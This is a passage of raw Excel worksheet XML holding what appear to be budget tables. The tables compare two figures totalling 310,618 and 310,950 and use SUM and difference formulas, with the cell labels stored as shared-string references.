  <pageMargins left="0.984251968503937" right="0.984251968503937" top="0.7874015748031497" bottom="0.7874015748031497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view="pageBreakPreview" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="B15" sqref="B15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="18.77734375" style="14" customWidth="1"/>
    <col min="2" max="3" width="14.77734375" style="14" customWidth="1"/>
    <col min="4" max="4" width="13.3359375" style="14" customWidth="1"/>
    <col min="5" max="5" width="18.77734375" style="14" customWidth="1"/>
    <col min="6" max="7" width="14.77734375" style="14" customWidth="1"/>
    <col min="8" max="8" width="13.3359375" style="14" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="16.5" customHeight="1">
      <c r="A1" s="143" t="s">
        <v>48</v>
      </c>
      <c r="B1" s="143"/>
      <c r="C1" s="143"/>
      <c r="D1" s="143"/>
    </row>
    <row r="2" spans="1:4" ht="14.25" customHeight="1">
      <c r="A2" s="21"/>
      <c r="B2" s="21"/>
      <c r="C2" s="21"/>
      <c r="D2" s="21"/>
    </row>
    <row r="3" spans="1:4" ht="19.5" customHeight="1">
      <c r="A3" s="22" t="s">
        <v>23</v>
      </c>
      <c r="B3" s="21"/>
      <c r="C3" s="21"/>
      <c r="D3" s="21"/>
    </row>
    <row r="4" ht="15" customHeight="1" thickBot="1">
      <c r="H4" s="60" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="5" spans="1:8" s="23" customFormat="1" ht="36" customHeight="1">
      <c r="A5" s="148" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="149"/>
      <c r="C5" s="149"/>
      <c r="D5" s="149"/>
      <c r="E5" s="149" t="s">
        <v>50</v>
      </c>
      <c r="F5" s="149"/>
      <c r="G5" s="149"/>
      <c r="H5" s="150"/>
    </row>
    <row r="6" spans="1:8" s="23" customFormat="1" ht="46.5" customHeight="1" thickBot="1">
      <c r="A6" s="61" t="s">
        <v>3</v>
      </c>
      <c r="B6" s="62" t="s">
        <v>70</v>
      </c>
      <c r="C6" s="62" t="s">
        <v>71</v>
      </c>
      <c r="D6" s="62" t="s">
        <v>72</v>
      </c>
      <c r="E6" s="63" t="s">
        <v>3</v>
      </c>
      <c r="F6" s="62" t="s">
        <v>73</v>
      </c>
      <c r="G6" s="62" t="s">
        <v>74</v>
      </c>
      <c r="H6" s="64" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="7" spans="1:8" s="24" customFormat="1" ht="33" customHeight="1" thickTop="1">
      <c r="A7" s="65" t="s">
        <v>140</v>
      </c>
      <c r="B7" s="125">
        <f>SUM(B8:B16)</f>
        <v>310618</v>
      </c>
      <c r="C7" s="125">
        <f>SUM(C8:C16)</f>
        <v>310950</v>
      </c>
      <c r="D7" s="126">
        <f>C7-B7</f>
        <v>332</v>
      </c>
      <c r="E7" s="66" t="s">
        <v>140</v>
      </c>
      <c r="F7" s="125">
        <f>SUM(F8:F16)</f>
        <v>310618</v>
      </c>
      <c r="G7" s="125">
        <f>SUM(G8:G16)</f>
        <v>310950</v>
      </c>
      <c r="H7" s="127">
        <f>G7-F7</f>
        <v>332</v>
      </c>
    </row>
    <row r="8" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A8" s="67" t="s">
        <v>75</v>
      </c>
      <c r="B8" s="68">
        <v>0</v>
      </c>
      <c r="C8" s="68">
        <v>0</v>
      </c>
      <c r="D8" s="69">
        <f aca="true" t="shared" si="0" ref="D8:D16">C8-B8</f>
        <v>0</v>
      </c>
      <c r="E8" s="70" t="s">
        <v>76</v>
      </c>
      <c r="F8" s="71">
        <v>9000</v>
      </c>
      <c r="G8" s="54">
        <v>9000</v>
      </c>
      <c r="H8" s="72">
        <f aca="true" t="shared" si="1" ref="H8:H16">G8-F8</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A9" s="67" t="s">
        <v>77</v>
      </c>
      <c r="B9" s="68">
        <v>0</v>
      </c>
      <c r="C9" s="68">
        <v>0</v>
      </c>
      <c r="D9" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E9" s="70" t="s">
        <v>78</v>
      </c>
      <c r="F9" s="54">
        <v>0</v>
      </c>
      <c r="G9" s="54">
        <v>0</v>
      </c>
      <c r="H9" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A10" s="67" t="s">
        <v>79</v>
      </c>
      <c r="B10" s="68">
        <v>0</v>
      </c>
      <c r="C10" s="68">
        <v>0</v>
      </c>
      <c r="D10" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E10" s="70" t="s">
        <v>80</v>
      </c>
      <c r="F10" s="54">
        <v>0</v>
      </c>
      <c r="G10" s="54">
        <v>0</v>
      </c>
      <c r="H10" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A11" s="73" t="s">
        <v>81</v>
      </c>
      <c r="B11" s="68">
        <v>0</v>
      </c>
      <c r="C11" s="68">
        <v>0</v>
      </c>
      <c r="D11" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E11" s="70" t="s">
        <v>82</v>
      </c>
      <c r="F11" s="54">
        <v>0</v>
      </c>
      <c r="G11" s="54">
        <v>0</v>
      </c>
      <c r="H11" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A12" s="67" t="s">
        <v>83</v>
      </c>
      <c r="B12" s="68">
        <v>0</v>
      </c>
      <c r="C12" s="68">
        <v>0</v>
      </c>
      <c r="D12" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E12" s="70" t="s">
        <v>84</v>
      </c>
      <c r="F12" s="71">
        <v>0</v>
      </c>
      <c r="G12" s="71">
        <v>0</v>
      </c>
      <c r="H12" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A13" s="67" t="s">
        <v>85</v>
      </c>
      <c r="B13" s="68">
        <v>301618</v>
      </c>
      <c r="C13" s="68">
        <v>301950</v>
      </c>
      <c r="D13" s="69">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="E13" s="70" t="s">
        <v>86</v>
      </c>
      <c r="F13" s="71">
        <v>301618</v>
      </c>
      <c r="G13" s="71">
        <v>301950</v>
      </c>
      <c r="H13" s="72">
        <f t="shared" si="1"/>
        <v>332</v>
      </c>
    </row>
    <row r="14" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A14" s="67" t="s">
        <v>87</v>
      </c>
      <c r="B14" s="68">
        <v>0</v>
      </c>
      <c r="C14" s="68">
        <v>0</v>
      </c>
      <c r="D14" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E14" s="70" t="s">
        <v>88</v>
      </c>
      <c r="F14" s="71">
        <v>0</v>
      </c>
      <c r="G14" s="71">
        <v>0</v>
      </c>
      <c r="H14" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:8" s="16" customFormat="1" ht="33" customHeight="1">
      <c r="A15" s="67" t="s">
        <v>89</v>
      </c>
      <c r="B15" s="68">
        <v>9000</v>
      </c>
      <c r="C15" s="68">
        <v>9000</v>
      </c>
      <c r="D15" s="69">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E15" s="70" t="s">
        <v>90</v>
      </c>
      <c r="F15" s="71">
        <v>0</v>
      </c>
      <c r="G15" s="71">
        <v>0</v>
      </c>
      <c r="H15" s="72">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="33" customHeight="1" thickBot="1">
      <c r="A16" s="74" t="s">
        <v>143</v>
      </c>
      <c r="B16" s="75">
        <v>0</v>
      </c>
      <c r="C16" s="75">
        <v>0</v>
      </c>
      <c r="D16" s="76">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E16" s="77" t="s">
        <v>91</v>
      </c>
      <c r="F16" s="75">
        <v>0</v>
      </c>
      <c r="G16" s="75">
        <v>0</v>
      </c>
      <c r="H16" s="78">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="3">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="A5:D5"/>
    <mergeCell ref="E5:H5"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.7874015748031497" bottom="0.7874015748031497" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup firstPageNumber="13" useFirstPageNumber="1" fitToHeight="0" fitToWidth="1" horizontalDpi="300" verticalDpi="3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5"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="3" width="3.77734375" style="27" customWidth="1"/>
    <col min="4" max="4" width="17.77734375" style="27" customWidth="1"/>
    <col min="5" max="7" width="13.77734375" style="27" customWidth="1"/>
    <col min="8" max="8" width="50.77734375" style="27" customWidth="1"/>
    <col min="9" max="16384" width="8.88671875" style="27" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" s="29" customFormat="1" ht="30" customHeight="1">
      <c r="A1" s="28"/>
      <c r="B1" s="28" t="s">
        <v>28</v>
      </c>
      <c r="C1" s="28"/>
      <c r="D1" s="28"/>
      <c r="E1" s="28"/>
    </row>
    <row r="2" spans="1:8" ht="15.75" customHeight="1" thickBot="1">
      <c r="A2" s="25"/>
      <c r="B2" s="25"/>
      <c r="C2" s="25"/>
      <c r="D2" s="26"/>
      <c r="E2" s="26"/>
      <c r="H2" s="37" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="3" spans="1:8" s="30" customFormat="1" ht="36.75" customHeight="1">
      <c r="A3" s="157" t="s">
        <v>92</v>
      </c>
      <c r="B3" s="158"/>
      <c r="C3" s="158"/>
      <c r="D3" s="158"/>
      <c r="E3" s="159" t="s">
        <v>93</v>
      </c>
      <c r="F3" s="161" t="s">
        <v>94</v>
      </c>
      <c r="G3" s="163" t="s">
        <v>95</v>
      </c>
      <c r="H3" s="165" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="4" spans="1:8" s="30" customFormat="1" ht="36.75" customHeight="1">
      <c r="A4" s="81" t="s">
        <v>24</v>
      </c>
      <c r="B4" s="82" t="s">
        <v>25</v>
      </c>
      <c r="C4" s="82" t="s">
        <v>26</v>
      </c>
      <c r="D4" s="83" t="s">
        <v>27</v>
      </c>
      <c r="E4" s="160"/>
      <c r="F4" s="162"/>
      <c r="G4" s="164"/>
      <c r="H4" s="166"/>
    </row>
    <row r="5" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A5" s="154" t="s">
        <v>97</v>
      </c>
      <c r="B5" s="152"/>
      <c r="C5" s="152"/>
      <c r="D5" s="152"/>
      <c r="E5" s="84">
        <f>SUM(E6)</f>
        <v>9000</v>
      </c>
      <c r="F5" s="84">
        <f>SUM(F6)</f>
        <v>9000</v>
      </c>
      <c r="G5" s="85">
        <f>F5-E5</f>
        <v>0</v>
      </c>
      <c r="H5" s="79"/>
    </row>
    <row r="6" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A6" s="86"/>
      <c r="B6" s="151" t="s">
        <v>98</v>
      </c>
      <c r="C6" s="152"/>
      <c r="D6" s="152"/>
      <c r="E6" s="84">
        <f>E7</f>
        <v>9000</v>
      </c>
      <c r="F6" s="84">
        <f>F7</f>
        <v>9000</v>
      </c>
      <c r="G6" s="85">
        <f aca="true" t="shared" si="0" ref="G6:G13">F6-E6</f>
        <v>0</v>
      </c>
      <c r="H6" s="79"/>
    </row>
    <row r="7" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A7" s="87"/>
      <c r="B7" s="88"/>
      <c r="C7" s="151" t="s">
        <v>99</v>
      </c>
      <c r="D7" s="153"/>
      <c r="E7" s="84">
        <f>E8</f>
        <v>9000</v>
      </c>
      <c r="F7" s="84">
        <f>F8</f>
        <v>9000</v>
      </c>
      <c r="G7" s="85">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H7" s="79"/>
    </row>
    <row r="8" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A8" s="87"/>
      <c r="B8" s="89"/>
      <c r="C8" s="90"/>
      <c r="D8" s="91" t="s">
        <v>100</v>
      </c>
      <c r="E8" s="84">
        <v>9000</v>
      </c>
      <c r="F8" s="84">
        <v>9000</v>
      </c>
      <c r="G8" s="85">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H8" s="79" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="9" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A9" s="154" t="s">
        <v>101</v>
      </c>
      <c r="B9" s="152"/>
      <c r="C9" s="152"/>
      <c r="D9" s="152"/>
      <c r="E9" s="84">
        <f aca="true" t="shared" si="1" ref="E9:F11">E10</f>
        <v>301618</v>
      </c>
      <c r="F9" s="84">
        <f t="shared" si="1"/>
        <v>301950</v>
      </c>
      <c r="G9" s="85">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="H9" s="79"/>
    </row>
    <row r="10" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A10" s="86"/>
      <c r="B10" s="151" t="s">
        <v>102</v>
      </c>
      <c r="C10" s="152"/>
      <c r="D10" s="152"/>
      <c r="E10" s="84">
        <f t="shared" si="1"/>
        <v>301618</v>
      </c>
      <c r="F10" s="84">
        <f t="shared" si="1"/>
        <v>301950</v>
      </c>
      <c r="G10" s="85">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="H10" s="79"/>
    </row>
    <row r="11" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1">
      <c r="A11" s="87"/>
      <c r="B11" s="92"/>
      <c r="C11" s="151" t="s">
        <v>103</v>
      </c>
      <c r="D11" s="153"/>
      <c r="E11" s="84">
        <f t="shared" si="1"/>
        <v>301618</v>
      </c>
      <c r="F11" s="84">
        <f t="shared" si="1"/>
        <v>301950</v>
      </c>
      <c r="G11" s="85">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="H11" s="79"/>
    </row>
    <row r="12" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1" thickBot="1">
      <c r="A12" s="87"/>
      <c r="B12" s="88"/>
      <c r="C12" s="92"/>
      <c r="D12" s="93" t="s">
        <v>104</v>
      </c>
      <c r="E12" s="94">
        <v>301618</v>
      </c>
      <c r="F12" s="94">
        <v>301950</v>
      </c>
      <c r="G12" s="85">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="H12" s="95" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="13" spans="1:8" s="31" customFormat="1" ht="39.75" customHeight="1" thickBot="1" thickTop="1">
      <c r="A13" s="155" t="s">
        <v>105</v>
      </c>
      <c r="B13" s="156"/>
      <c r="C13" s="156"/>
      <c r="D13" s="156"/>
      <c r="E13" s="128">
        <f>SUM(E5,E9)</f>
        <v>310618</v>
      </c>
      <c r="F13" s="128">
        <f>SUM(F5,F9)</f>
        <v>310950</v>
      </c>
      <c r="G13" s="129">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
      <c r="H13" s="130"/>
    </row>
    <row r="14" ht="19.5" customHeight="1"/>
    <row r="15" ht="16.5">
      <c r="H15" s="80"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="12">
    <mergeCell ref="A3:D3"/>
    <mergeCell ref="E3:E4"/>
    <mergeCell ref="F3:F4"/>
    <mergeCell ref="G3:G4"/>
    <mergeCell ref="H3:H4"/>
    <mergeCell ref="A5:D5"/>
    <mergeCell ref="B6:D6"/>
    <mergeCell ref="C7:D7"/>
    <mergeCell ref="A9:D9"/>
    <mergeCell ref="B10:D10"/>
    <mergeCell ref="C11:D11"/>
    <mergeCell ref="A13:D13"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.3937007874015748" right="0.3937007874015748" top="0.7874015748031497" bottom="0.7874015748031497" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="landscape" paperSize="9" scale="9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showGridLines="0" view="pageBreakPreview" zoomScaleNormal="75" zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A1" sqref="A1:D1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="2" width="3.77734375" style="97" customWidth="1"/>
    <col min="3" max="4" width="4.3359375" style="97" customWidth="1"/>
    <col min="5" max="5" width="3.77734375" style="97" customWidth="1"/>
    <col min="6" max="7" width="2.77734375" style="97" customWidth="1"/>
    <col min="8" max="8" width="5.77734375" style="97" customWidth="1"/>
    <col min="9" max="9" width="47.77734375" style="97" customWidth="1"/>
    <col min="10" max="12" width="13.77734375" style="97" customWidth="1"/>
    <col min="13" max="19" width="3.77734375" style="97" customWidth="1"/>
    <col min="20" max="16384" width="8.88671875" style="97" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="28.5" customHeight="1">
      <c r="A1" s="179" t="s">
        <v>33</v>
      </c>
      <c r="B1" s="179"/>
      <c r="C1" s="179"/>
      <c r="D1" s="179"/>
      <c r="E1" s="96"/>
      <c r="F1" s="96"/>
      <c r="G1" s="96"/>
      <c r="H1" s="16"/>
      <c r="I1" s="16"/>
    </row>
    <row r="2" spans="1:12" ht="15" thickBot="1">
      <c r="A2" s="180" t="s">
        <v>4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</row>
    <row r="3" spans="1:12" ht="34.5" customHeight="1" thickBot="1">
      <c r="A3" s="98" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="99" t="s">
        <v>29</v>
      </c>
      <c r="C3" s="99" t="s">
        <v>30</v>
      </c>
      <c r="D3" s="99" t="s">
        <v>31</v>
      </c>
      <c r="E3" s="100" t="s">
        <v>32</v>
      </c>
      <c r="F3" s="181" t="s">
        <v>51</v>
      </c>
      <c r="G3" s="182"/>
      <c r="H3" s="183"/>
      <c r="I3" s="101" t="s">
        <v>1</v>
      </c>
      <c r="J3" s="102" t="s">
        <v>73</v>
      </c>
      <c r="K3" s="102" t="s">
        <v>74</v>
      </c>
      <c r="L3" s="103" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="25.5" customHeight="1">
      <c r="A4" s="184" t="s">
        <v>112</v>
      </c>
      <c r="B4" s="185"/>
      <c r="C4" s="185"/>
      <c r="D4" s="185"/>
      <c r="E4" s="185"/>
      <c r="F4" s="185"/>
      <c r="G4" s="185"/>
      <c r="H4" s="185"/>
      <c r="I4" s="185"/>
      <c r="J4" s="104">
        <f>J5</f>
        <v>310618</v>
      </c>
      <c r="K4" s="104">
        <f>K5</f>
        <v>310950</v>
      </c>
      <c r="L4" s="105">
        <f aca="true" t="shared" si="0" ref="L4:L17">K4-J4</f>
        <v>332</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="25.5" customHeight="1">
      <c r="A5" s="48"/>
      <c r="B5" s="172" t="s">
        <v>113</v>
      </c>
      <c r="C5" s="173"/>
      <c r="D5" s="173"/>
      <c r="E5" s="173"/>
      <c r="F5" s="173"/>
      <c r="G5" s="173"/>
      <c r="H5" s="173"/>
      <c r="I5" s="173"/>
      <c r="J5" s="59">
        <f>J6+J12</f>
        <v>310618</v>
      </c>
      <c r="K5" s="59">
        <f>K6+K12</f>
        <v>310950</v>
      </c>
      <c r="L5" s="55">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="25.5" customHeight="1">
      <c r="A6" s="49"/>
      <c r="B6" s="50"/>
      <c r="C6" s="172" t="s">
        <v>114</v>
      </c>
      <c r="D6" s="173"/>
      <c r="E6" s="173"/>
      <c r="F6" s="173"/>
      <c r="G6" s="173"/>
      <c r="H6" s="173"/>
      <c r="I6" s="173"/>
      <c r="J6" s="59">
        <f>J7</f>
        <v>9000</v>
      </c>
      <c r="K6" s="59">
        <f>K7</f>
        <v>9000</v>
      </c>
      <c r="L6" s="55">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="25.5" customHeight="1">
      <c r="A7" s="49"/>
      <c r="B7" s="51"/>
      <c r="C7" s="50"/>
      <c r="D7" s="172" t="s">
        <v>115</v>
      </c>
      <c r="E7" s="173"/>
      <c r="F7" s="173"/>
      <c r="G7" s="173"/>
      <c r="H7" s="173"/>
      <c r="I7" s="173"/>
      <c r="J7" s="59">
        <f>J8</f>
        <v>9000</v>
      </c>
      <c r="K7" s="59">
        <f>K8</f>
        <v>9000</v>
      </c>
      <c r="L7" s="55">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="25.5" customHeight="1">
      <c r="A8" s="49"/>
      <c r="B8" s="51"/>
      <c r="C8" s="51"/>
      <c r="D8" s="50"/>
      <c r="E8" s="172" t="s">
        <v>52</v>
      </c>
      <c r="F8" s="173"/>
      <c r="G8" s="173"/>
      <c r="H8" s="173"/>
      <c r="I8" s="173"/>
      <c r="J8" s="59">
        <f aca="true" t="shared" si="1" ref="J8:K10">J9</f>
        <v>9000</v>
      </c>
      <c r="K8" s="59">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="L8" s="55">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="25.5" customHeight="1">
      <c r="A9" s="49"/>
      <c r="B9" s="51"/>
      <c r="C9" s="51"/>
      <c r="D9" s="51"/>
      <c r="E9" s="52"/>
      <c r="F9" s="172" t="s">
        <v>34</v>
      </c>
      <c r="G9" s="173"/>
      <c r="H9" s="173"/>
      <c r="I9" s="173"/>
      <c r="J9" s="59">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="K9" s="59">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="L9" s="55">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="25.5" customHeight="1">
      <c r="A10" s="49"/>
      <c r="B10" s="51"/>
      <c r="C10" s="51"/>
      <c r="D10" s="51"/>
      <c r="E10" s="53"/>
      <c r="F10" s="175" t="s">
        <v>116</v>
      </c>
      <c r="G10" s="176"/>
      <c r="H10" s="176"/>
      <c r="I10" s="176"/>
      <c r="J10" s="106">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="K10" s="106">
        <f t="shared" si="1"/>
        <v>9000</v>
      </c>
      <c r="L10" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="25.5" customHeight="1">
      <c r="A11" s="49"/>
      <c r="B11" s="51"/>
      <c r="C11" s="107"/>
      <c r="D11" s="51"/>
      <c r="E11" s="108"/>
      <c r="F11" s="109"/>
      <c r="G11" s="178" t="s">
        <v>117</v>
      </c>
      <c r="H11" s="178"/>
      <c r="I11" s="178"/>
      <c r="J11" s="110">
        <v>9000</v>
      </c>
      <c r="K11" s="110">
        <v>9000</v>
      </c>
      <c r="L11" s="58">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:12" ht="25.5" customHeight="1">
      <c r="A12" s="49"/>
      <c r="B12" s="51"/>
      <c r="C12" s="172" t="s">
        <v>139</v>
      </c>
      <c r="D12" s="173"/>
      <c r="E12" s="173"/>
      <c r="F12" s="173"/>
      <c r="G12" s="173"/>
      <c r="H12" s="173"/>
      <c r="I12" s="174"/>
      <c r="J12" s="110">
        <f aca="true" t="shared" si="2" ref="J12:K15">J13</f>
        <v>301618</v>
      </c>
      <c r="K12" s="110">
        <f t="shared" si="2"/>
        <v>301950</v>
      </c>
      <c r="L12" s="58">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="13" spans="1:12" ht="25.5" customHeight="1">
      <c r="A13" s="49"/>
      <c r="B13" s="51"/>
      <c r="C13" s="50"/>
      <c r="D13" s="172" t="s">
        <v>109</v>
      </c>
      <c r="E13" s="173"/>
      <c r="F13" s="173"/>
      <c r="G13" s="173"/>
      <c r="H13" s="173"/>
      <c r="I13" s="174"/>
      <c r="J13" s="59">
        <f t="shared" si="2"/>
        <v>301618</v>
      </c>
      <c r="K13" s="59">
        <f t="shared" si="2"/>
        <v>301950</v>
      </c>
      <c r="L13" s="55">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="14" spans="1:12" ht="25.5" customHeight="1">
      <c r="A14" s="49"/>
      <c r="B14" s="51"/>
      <c r="C14" s="51"/>
      <c r="D14" s="50"/>
      <c r="E14" s="172" t="s">
        <v>110</v>
      </c>
      <c r="F14" s="173"/>
      <c r="G14" s="173"/>
      <c r="H14" s="173"/>
      <c r="I14" s="174"/>
      <c r="J14" s="59">
        <f t="shared" si="2"/>
        <v>301618</v>
      </c>
      <c r="K14" s="59">
        <f t="shared" si="2"/>
        <v>301950</v>
      </c>
      <c r="L14" s="55">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="15" spans="1:12" ht="25.5" customHeight="1">
      <c r="A15" s="49"/>
      <c r="B15" s="51"/>
      <c r="C15" s="51"/>
      <c r="D15" s="51"/>
      <c r="E15" s="52"/>
      <c r="F15" s="172" t="s">
        <v>44</v>
      </c>
      <c r="G15" s="173"/>
      <c r="H15" s="173"/>
      <c r="I15" s="174"/>
      <c r="J15" s="59">
        <f t="shared" si="2"/>
        <v>301618</v>
      </c>
      <c r="K15" s="59">
        <f t="shared" si="2"/>
        <v>301950</v>
      </c>
      <c r="L15" s="55">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="16" spans="1:12" ht="25.5" customHeight="1">
      <c r="A16" s="49"/>
      <c r="B16" s="51"/>
      <c r="C16" s="51"/>
      <c r="D16" s="51"/>
      <c r="E16" s="53"/>
      <c r="F16" s="175" t="s">
        <v>111</v>
      </c>
      <c r="G16" s="176"/>
      <c r="H16" s="176"/>
      <c r="I16" s="177"/>
      <c r="J16" s="106">
        <f>J17</f>
        <v>301618</v>
      </c>
      <c r="K16" s="106">
        <f>K17</f>
        <v>301950</v>
      </c>
      <c r="L16" s="57">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="17" spans="1:12" ht="25.5" customHeight="1" thickBot="1">
      <c r="A17" s="49"/>
      <c r="B17" s="51"/>
      <c r="C17" s="51"/>
      <c r="D17" s="51"/>
      <c r="E17" s="53"/>
      <c r="F17" s="111"/>
      <c r="G17" s="167" t="s">
        <v>118</v>
      </c>
      <c r="H17" s="167"/>
      <c r="I17" s="168"/>
      <c r="J17" s="112">
        <v>301618</v>
      </c>
      <c r="K17" s="112">
        <v>301950</v>
      </c>
      <c r="L17" s="113">
        <f t="shared" si="0"/>
        <v>332</v>
      </c>
    </row>
    <row r="18" spans="1:12" ht="25.5" customHeight="1" thickBot="1" thickTop="1">
      <c r="A18" s="169" t="s">
        <v>0</v>
      </c>
      <c r="B18" s="170"/>
      <c r="C18" s="170"/>
      <c r="D18" s="170"/>
      <c r="E18" s="170"/>
      <c r="F18" s="170"/>
      <c r="G18" s="170"/>
      <c r="H18" s="170"/>
      <c r="I18" s="171"/>
      <c r="J18" s="114">
        <f>J4</f>
        <v>310618</v>
      </c>
      <c r="K18" s="114">
        <f>K4</f>
        <v>310950</v>
      </c>
      <c r="L18" s="117">
        <f>K18-J18</f>
        <v>332</v>
      </c>
    </row>
    <row r="19" spans="1:12" ht="27" customHeight="1">
      <c r="A19" s="115"/>
      <c r="B19" s="115"/>
      <c r="C19" s="115"/>
      <c r="D19" s="115"/>
      <c r="E19" s="115"/>
      <c r="F19" s="115"/>
      <c r="G19" s="115"/>
      <c r="H19" s="115"/>
      <c r="I19" s="115"/>
      <c r="J19" s="39"/>
      <c r="K19" s="39"/>
      <c r="L19" s="116"/>
    </row>
    <row r="20" spans="1:12" ht="27" customHeight="1">
      <c r="A20" s="115"/>
      <c r="B20" s="115"/>
      <c r="C20" s="115"/>
      <c r="D20" s="115"/>
      <c r="E20" s="115"/>
      <c r="F20" s="115"/>
      <c r="G20" s="115"/>
      <c r="H20" s="115"/>
      <c r="I20" s="115"/>
      <c r="J20" s="39"/>
      <c r="K20" s="39"/>
      <c r="L20" s="116"/>
    </row>
    <row r="21" spans="1:12" ht="27" customHeight="1">
      <c r="A21" s="115"/>
      <c r="B21" s="115"/>
      <c r="C21" s="115"/>
      <c r="D21" s="115"/>
      <c r="E21" s="115"/>
      <c r="F21" s="115"/>
      <c r="G21" s="115"/>
      <c r="H21" s="115"/>
      <c r="I21" s="115"/>
      <c r="J21" s="39"/>
      <c r="K21" s="39"/>
